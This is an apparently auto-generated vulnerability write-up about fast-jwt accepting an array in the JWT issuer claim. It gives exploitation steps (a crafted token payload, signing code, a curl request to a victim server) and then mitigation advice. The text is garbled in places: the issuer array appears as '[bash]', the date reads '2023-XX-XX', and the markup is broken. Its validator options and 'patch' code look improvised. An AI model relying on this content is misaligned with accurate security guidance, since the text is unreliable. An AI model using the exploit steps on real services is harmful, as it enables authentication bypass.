How the CVE Works:
The vulnerability in the `fast-jwt` library arises from improper validation of the `iss` (issuer) claim in JSON Web Tokens (JWTs). According to RFC 7519, the `iss` claim must be a single string value. However, `fast-jwt` incorrectly accepts an array of strings as a valid `iss` value. This flaw allows an attacker to craft a malicious JWT with an `iss` claim containing both a legitimate issuer (e.g., https://valid-iss`) and an attacker-controlled domain (e.g.,https://attacker-domain/`). When the JWT is validated by fast-jwt, the library mistakenly considers it valid, enabling the attacker to bypass issuer validation checks. This can lead to unauthorized access or privilege escalation if the application relies on `fast-jwt` for JWT validation.
DailyCVE Form:
Platform: Node.js Version: fast-jwt (affected versions) Vulnerability: JWT Issuer Claim Validation Severity: Critical Date: 2023-XX-XX
What Undercode Say:
Exploitation:
- Crafting Malicious JWT: An attacker creates a JWT with an `iss` claim containing an array of strings, including their domain and the legitimate issuer.
{ "iss": [bash], "sub": "user", "exp": 1735689600 } - Signing the JWT: The attacker signs the JWT using their private key.
const jwt = require('jsonwebtoken'); const maliciousToken = jwt.sign(payload, privateKey, { algorithm: 'RS256' }); - Sending the JWT: The attacker sends the malicious JWT to the victim server.
curl -X GET http://victim-server/auth -H "Authorization: Bearer $maliciousToken"
Protection:
- Update
fast-jwt: Ensure the library is updated to a patched version that enforces single-string `iss` validation.npm update fast-jwt
- Custom Validation: Implement custom validation logic to reject JWTs with array-based `iss` claims.
const { createVerifier } = require('fast-jwt'); const jwtVerifier = createVerifier({ key: keyFetcher, allowedIss: 'https://valid-iss', issValidator: (iss) => { if (Array.isArray(iss)) throw new Error('Invalid iss claim'); return iss === 'https://valid-iss'; } }); - Use Secure Libraries: Replace `fast-jwt` with a more secure JWT library like `jsonwebtoken` or
jose.npm install jsonwebtoken
- Monitor Logs: Regularly monitor server logs for unusual JWT validation patterns.
tail -f /var/log/auth.log | grep "JWT validation failed"
Additional Commands:
- Check Installed Version:
npm list fast-jwt
- Test JWT Validation:
const payload = await jwtVerifier(maliciousToken); if (payload) console.log('JWT is valid'); else console.log('JWT is invalid');
Code Snippets:
- Patch for
fast-jwt:// In verifier.js, replace the iss validation logic if (Array.isArray(iss)) { throw new Error('iss claim must be a string'); } - Secure JWT Generation:
const jwt = require('jsonwebtoken'); const secureToken = jwt.sign({ iss: 'https://valid-iss' }, privateKey, { algorithm: 'RS256' });By following these steps, developers can mitigate the risk posed by this critical vulnerability and ensure secure JWT validation in their applications.
References:
Reported By: https://github.com/advisories/GHSA-gm45-q3v2-6cf8
Extra Source Hub:
Undercode
